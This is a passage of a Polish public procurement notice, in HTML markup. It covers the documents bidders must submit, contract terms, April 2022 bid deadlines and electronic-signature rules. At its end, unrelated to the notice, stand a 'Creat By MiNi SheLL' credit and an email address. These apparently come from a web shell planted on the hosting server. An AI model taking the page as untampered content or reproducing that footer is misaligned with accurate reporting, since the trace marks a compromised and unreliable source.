kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty częściowej, w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) Pełnomocnictwo upoważniające do podpisania oferty, o ile ofertę podpisuje pełnomocnik;<br/>2) Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy;<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie to składa każdy z Wykonawców.<br/>4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podpisane (jednym z podpisów, o których mowa w ust. 3 niniejszego rozdziału) oświadczenie, o którym mowa w art. 117 ust. 4, z którego wynika, które usługi wykonują poszczególni Wykonawcy zgodnie z załącznikiem nr 6 do SWZ<br/>5) Inne<br/> wypełniony i podpisany (jednym z podpisów, o których mowa w ust. 3 niniejszego rozdziału), formularz ofertowy (załącznik nr 2 do SWZ),<br/> Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 118 ustawy potwierdzające brak podstawa wykluczenia (w związku z artykułem 119 ustawy) wraz ze zobowiązaniem tego podmiotu do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia- zgodnie z załącznikiem nr 7 do SWZ.<br/>6) Uzasadnienie dotyczące tajemnicy przedsiębiorstwa – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie to składa każdy z Wykonawców oświadczenie<br/>Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału<br/>wpostępowaniu - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. Zamawiający żąda od<br/>Wykonawcy wspólnie ubiegających się o udzielenie zamówienia - składa każdy z Wykonawców<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ustawy przewiduje możliwość dokonania zmiany zawartej umowy, wyłącznie w zakresie dopuszczalnym przepisami Ustawy, za zgodą obu Stron, w okolicznościach wskazanych w projektowanych postanowieniach umowy stanowiących załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy pod adresem:https://amw.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. sekcji 3.6 Ogłoszenia: 11. Wykonawcy mogą kierować zapytania do<br/>Zamawiającego,takżemailowo na adres: dzp.lu@amw.com.pl z dopiskiem: „Postępowanie nr<br/>DZPOL.2616.40.2022”.Zapytania kierowane na inne adresy mailowe Zamawiającego – nie<br/>będąrozpatrywane. 12.Zamawiający zaleca wczytywanie na Platformę plików w<br/>maksymalnymrozmiarze do 100 MB.13. Dokumenty przekazywane za pośrednictwem środków<br/>komunikacjielektronicznej w formieelektronicznej są sporządzane, zgodnie z § 2 Rozporządzenia<br/>PrezesaRady Ministrów z dnia 30grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywaniainformacji oraz wymagańtechnicznych dla dokumentów elektronicznych oraz<br/>środkówkomunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie(Dz. U. z 2020 r., poz. 2542) –zwane dalej jako „Rozporządzenie” – w związku z art. 18<br/>ustawy zdnia 17 lutego 2005 r. oinformatyzacji działalności podmiotów realizujących zadania<br/>publiczne(Dz. U. z 2020 r., poz.346 z późn. zm.), odsyłającym do rozporządzenia Rady<br/>Ministrów z dnia12 kwietnia 2012 r. wsprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dlarejestrów publicznych iwymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagańdla systemówteleinformatycznych (tj. Dz. U. z 2017 r., poz. 2247 z późn.<br/>zm.) oraz zgodnie zformatamipodpisu elektronicznego określonymi w tych przepisach prawa – w<br/>szczególności wformatach:.pdf, .doc, .docx, .rtf, .odt., .xades, .pades, .txt, .xls, .xlsx<br/>.zip.Zamawiający zalecaprzesyłanieplików w formacie .pdf.14. Zalecenia zamawiającego<br/>odnośnie podpisuelektronicznego:a)odnośnie kwalifikowanego podpisu elektronicznego:• dla<br/>dokumentów wformacie „pdf” zalecasię podpis w formatem PAdES,• dokumenty w formacie<br/>innym niż „pdf”zaleca się podpisywaćformatem XAdES.b) odnośnie podpisu osobistego:• dla<br/>dokumentów wformacie „pdf” lub „xml”zaleca się podpis wewnętrzny (otoczony),• dokumenty w<br/>formacie innymniż „pdf” zaleca siępodpisywać podpisem zewnętrznym lub otaczającym.c)<br/>odnośnie podpisuzaufanego:• wielkośćdokumentów nie może przekraczać 10 MB (Szczegółowe<br/>informacjedotyczące podpisuzaufanego można uzyskać pod<br/>adresem:https://www.gov.pl/web/gov/podpisz-dokumentelektroniczniewykorzystajpodpiszaufany)<br/>Jeżelijest to możliwe, zalecane jest stosowaniepodpisu otaczającego –wewnętrznego –<br/>który polegana tym, że jest zapisany łącznie zpodpisywanym dokumentem (tworzą jeden plik), a<br/>nieoddzielnie (plik podpisywany i plikpodpisu).15. Informacja na temat specyfikacji połączenia,formatu przesyłanych danych orazkodowania i oznaczania czasu odbioru danych:1)<br/>szyfrowanieza pomocą protokołu TLS;2)formularze dostępne są w formacie HTML z<br/>kodowaniem UTF-8;3)wszelkie operacje opierająsię o czas serwera i dane zapisywane są z<br/>dokładnością co do setnej części sekundy;4) pliki oferty wczytane przez wykonawcę na<br/>Platformę i zapisane, widoczne sąw Platformie jakozaszyfrowane, możliwość otwarcia plików<br/>dostępna jest dopiero poodszyfrowaniu przezzamawiającego po upływie terminu otwarcia<br/>ofert;5) oznaczenie czasuodbioru danych przezPlatformę stanowi przypiętą do dokumentu<br/>elektronicznego datę orazdokładny czas (hh:mm:ss),znajdującą się po lewej stronie dokumentu<br/>w kolumnie „Data przesłania”.

Creat By MiNi SheLL
Email: jattceo@gmail.com